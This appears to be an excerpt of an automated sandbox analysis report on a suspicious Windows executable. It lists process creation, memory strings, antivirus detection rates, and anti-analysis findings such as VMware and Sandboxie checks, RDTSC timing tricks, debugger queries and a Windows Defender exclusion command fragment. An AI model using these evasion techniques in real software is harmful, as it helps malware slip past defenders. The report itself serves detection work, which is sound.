          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 8sxgohtHjM.exeVirustotal: Detection: 34%
          Source: 8sxgohtHjM.exeReversingLabs: Detection: 33%
          Source: unknownProcess created: C:\Users\user\Desktop\8sxgohtHjM.exe 'C:\Users\user\Desktop\8sxgohtHjM.exe'
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess created: C:\Users\user\Desktop\8sxgohtHjM.exe C:\Users\user\Desktop\8sxgohtHjM.exe
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess created: C:\Users\user\Desktop\8sxgohtHjM.exe C:\Users\user\Desktop\8sxgohtHjM.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess created: C:\Users\user\Desktop\8sxgohtHjM.exe C:\Users\user\Desktop\8sxgohtHjM.exe
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess created: C:\Users\user\Desktop\8sxgohtHjM.exe C:\Users\user\Desktop\8sxgohtHjM.exe
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 8sxgohtHjM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 8sxgohtHjM.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: 8sxgohtHjM.exe, 00000004.00000002.311207883.0000000001090000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.298573010.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: 8sxgohtHjM.exe, 00000004.00000002.311207883.0000000001090000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8sxgohtHjM.exe, 00000004.00000002.311350228.000000000128F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000010.00000002.521855164.0000000003AF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 8sxgohtHjM.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.298573010.000000000E1C0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025B446F push edi; retn 0004h
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025B6841 pushad ; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025BAED1 pushfd ; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025BAEC9 pushfd ; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025BAEEF pushfd ; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025BAE88 pushfd ; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025BAF30 pushfd ; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025B7038 push esp; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_025B3768 push eax; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_0740D6D2 push 0000005Ah; retf
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 0_2_0740A50B push ss; retf
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00415458 push ebx; iretd
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0040BD7A push ds; iretd
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00414E8D push ds; retf
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FEB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FEB46C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE5458 push ebx; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FEB40B push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FEB402 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FDBD7A push ds; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_00FE4E8D push ds; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.7978615602
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 8sxgohtHjM.exe PID: 6752, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000FD85E4 second address: 0000000000FD85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000FD896E second address: 0000000000FD8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\8sxgohtHjM.exe TID: 6756Thread sleep time: -104542s >= -30000s
          Source: C:\Users\user\Desktop\8sxgohtHjM.exe TID: 6772Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5564Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6512Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeThread delayed: delay time: 104542
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.294253858.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.294253858.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.294016194.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.293635023.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.294379654.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: NETSTAT.EXE, 00000010.00000002.521643349.000000000370F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000005.00000000.294253858.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.294253858.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.294379654.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000000.288200440.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.293635023.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.293635023.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: 8sxgohtHjM.exe, 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000005.00000000.293635023.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01264015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01264015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01217016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01217016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01217016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01261074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01252073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01213884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01213884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01268B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01265BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0124D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C03E2 mov eax, dword ptr fs:[00000030h]
